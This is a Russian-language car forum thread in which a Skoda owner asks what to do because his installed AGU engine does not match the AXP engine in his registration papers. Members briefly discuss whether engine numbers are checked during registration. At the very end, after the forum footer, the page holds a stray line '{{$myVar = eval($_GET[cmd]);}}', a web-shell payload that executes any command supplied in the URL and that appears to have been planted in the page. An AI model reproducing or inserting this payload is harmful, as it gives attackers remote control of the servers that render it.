+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Регистрация


  1. #1

    Регистрация

    Ребята подскажите как быть вот уже три года катаюсь с двигателем AGU без доков, а в тех паспорте стоит 1.4 AXP. Конечно в капот наврят ли полезут но было пару моментов неприятных, хочется ездить спокойно так сказать. Что делать м ? Всем спасибо за адекватные ответы.

  2. #2
    ---- если твой агу , не числится в базах по розыску , ничего не сделают . А при снятии и постановке на учет , будут проблемы

  3. #3
    Да у меня по номерам двойник, такая шкода в Москоу катаеться, вот только у кого двойник а у кого оригинал неизвестно. На блоке вроде номера ровные не перебиты.

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Сейча убрали контроль за номером движки, при снятии-постановке с учета его не смотрят тоже, даже не проверяют вообще, и в новых доках у кого еще и ничего не пишут в графе номер движки.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    Цитата Сообщение от Badik52 Посмотреть сообщение
    Да у меня по номерам двойник, такая шкода в Москоу катаеться, вот только у кого двойник а у кого оригинал неизвестно. На блоке вроде номера ровные не перебиты.
    -- тем более , надо вопрос решать . Не хочется обещать , если в среду увижу человека который точно скажет - как быть , то- только тогда смогу ченить сказать

  6. #6
    Да только в доках у меня стоит AXP, а на сомом деле AGU. Для перерегистрации доков нет на мотор, вернее есть ПТС на машину которой нет. Вот и вопрос что делать ? Как вариант купить блок с доками. Что скажите ?

  7. #7
    Цитата Сообщение от Badik52 Посмотреть сообщение
    Да только в доках у меня стоит AXP, а на сомом деле AGU. Для перерегистрации доков нет на мотор, вернее есть ПТС на машину которой нет. Вот и вопрос что делать ? Как вариант купить блок с доками. Что скажите ?
    ---- смогу сказать не раньше среды . В Белоруссии так же было , когда не стали писать в свидетельстве номера двигателя

  8. #8
    Alexandr 922 заранее благодарен за внимание, не поймите меня неправильно но купить движок за 50 000 с пробегом в 60 тыс и всеми потрохами это просто клад.

  9. #9
    Цитата Сообщение от Badik52 Посмотреть сообщение
    Alexandr 922 заранее благодарен за внимание, не поймите меня неправильно но купить движок за 50 000 с пробегом в 60 тыс и всеми потрохами это просто клад.
    -- ПОВЕРЬ НА СЛОВО , цену запчастям я очень хорошо знаю

+ Ответить в теме

Похожие темы

  1. Регистрация товарных знаков
    от Zews в разделе Барахолка
    Ответов: 2
    Последнее сообщение: 02.04.2024, 11:17
  2. Регистрация на 3-й этап RHHCC в Тушино ...
    от ААГ в разделе Авто спорт
    Ответов: 61
    Последнее сообщение: 23.05.2012, 01:51
  3. Регистрация Авто.
    от Rust в разделе Законодательство и страхование
    Ответов: 2
    Последнее сообщение: 08.05.2008, 00:00
  4. регистрация на VW FEST 2007
    от magnum126 в разделе Клубная Тема
    Ответов: 20
    Последнее сообщение: 07.09.2007, 15:55
  5. TRACK BiTVA: STI VS EVO (регистрация открыта).
    от nlc в разделе Авто спорт
    Ответов: 6
    Последнее сообщение: 03.08.2006, 12:25

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}